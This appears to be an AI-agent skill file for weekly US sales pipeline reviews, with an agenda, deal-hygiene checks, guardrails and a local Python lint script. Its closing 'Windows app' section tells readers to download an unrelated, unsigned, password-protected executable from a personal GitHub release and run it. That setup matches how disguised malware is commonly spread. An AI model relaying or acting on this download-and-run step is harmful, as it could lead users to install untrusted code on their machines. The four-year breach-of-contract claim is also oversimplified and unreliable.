Pipeline Review Checklist
Runs a weekly US pipeline review with a fixed agenda, flags stale and incomplete deals, and prints the questions the manager asks. Written for US sales managers and RevOps leads running weekly pipeline reviews.
Use this skill when someone asks for:
- pipeline review checklist
- weekly sales pipeline meeting
- pipeline hygiene checklist
- sales forecast review agenda
The job
Weekly pipeline reviews turn into deal-status storytelling, so stale deals stay in the forecast and the close date is really a guess.
What you get
- Export the open pipeline and check each deal for owner, stage, amount, close date and next step.
- Lint the agenda so every deal carries a stage, a next step and a date.
- Flag the deals with no next step, a close date in the past or an amount of zero.
- Hand the flagged list to the manager in rank order before the meeting starts.
Output contract:
- agenda - the fixed review order with a time box for each part
- flagged_deals - stale, incomplete and amount-less deals with the reason
- questions - the three questions asked on every deal
- forecast_note - what changed since the last review, in USD
US specifics that matter
- ASC 606 governs when revenue is recognized, so a signed order is not the same as a closed deal in the books.
- Federal contractors register in SAM.gov and use a unique entity identifier on proposals and contracts.
- The statute of limitations for breach of contract is generally four years in most US states, so old pipeline notes can still surface in a dispute.
- US business days exclude federal holidays, and the OPM publishes the holiday list each year.
Guardrails (hard rules)
- Never change a deal stage, amount or close date in the CRM; the report lists what needs a human decision.
- Never fill a missing amount or close date with a guess.
- Never turn the review into a ranking of people for a quota decision; that stays a separate human process.
- Never forecast revenue as if it were booked.
Quickstart
1. Fill in the brief
templates/pipeline-deals.csv is the starting point. Copy it, fill in your own numbers, and
keep the field names - the script reads them by name.
2. Run the script
python3 scripts/lint_pipeline_review.py --input pipeline-deals.csv --out ./out
The script is standalone: Python 3 standard library only, no install step, no network calls, no API keys.
3. Check the result against the reference
references/pipeline-review-rules.md holds the limits, the US rules and the checklist the output has
to satisfy. Read it before you send anything to a customer or a platform.
Per-deal fields, no exceptions
- Deal name, account, owner, stage, amount in USD, close date and next step.
- A next step with a date, not a next step with a hope.
- A close date in the future, or the deal moves to a watch list.
- The date of the last real activity, not the last email anyone sent.
Stages have to mean something
- Write the exit criteria for each stage once and keep them identical for every rep.
- A stage that can hold every deal is not a stage.
- Name the evidence that moves a deal forward, for example a signed order or a completed security review.
- One stage per meaning; split the stage instead of arguing about it.
Meeting discipline
- Time-box the review and run the deals in the same order every week.
- Deal reviews are about the deal, not the teller's performance.
- Record the decision, the owner and the date at the end of each deal.
- Leave the review with a dated action list, not a sentiment.
The Windows app (optional)
The workflow above runs anywhere Python 3 runs. If you also want the publisher's Windows multi-tool app for the workflows in this catalog, it is a separate download. This bundle does not contain it, does not install it, and never runs it - you decide whether to fetch it.
| Item | Value |
|---|---|
| Download | https://github.com/rapidworker1/Multiple-AI-models-Toolkit/releases/download/Main/multitool.zip |
| File | multitool.zip (4.4 MB) |
| SHA-256 | a82bf643085d86cae398f49ec9a53dad213d0118dfb49fcf405c4679c9c4c5b6 |
| Inside the archive | multitool/toolkit.exe |
Check the download before you run it. PowerShell:
Get-FileHash .\multitool.zip -Algorithm SHA256
The hash must match the value in the table. Then extract the archive and start
multitool/toolkit.exe.
The program is not code-signed, so Windows SmartScreen shows Unknown publisher. Run it only if you accept an unsigned program, keep it in a folder of its own, and do not run it as administrator unless you have a reason to.
The installer asks for a password; ask the publisher for it before you start.
